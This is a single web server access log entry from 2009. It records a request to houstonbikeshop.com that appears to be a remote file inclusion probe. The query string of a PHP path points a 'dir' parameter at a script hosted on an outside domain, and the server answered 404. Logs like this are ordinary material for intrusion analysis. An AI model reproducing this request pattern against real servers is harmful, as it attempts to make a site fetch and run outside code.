211.189.39.159 - - [12/Nov/2009:06:23:57 -0800] "GET /logs//ask_password.php?%20dir=http://oktober.fileave.com/read.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
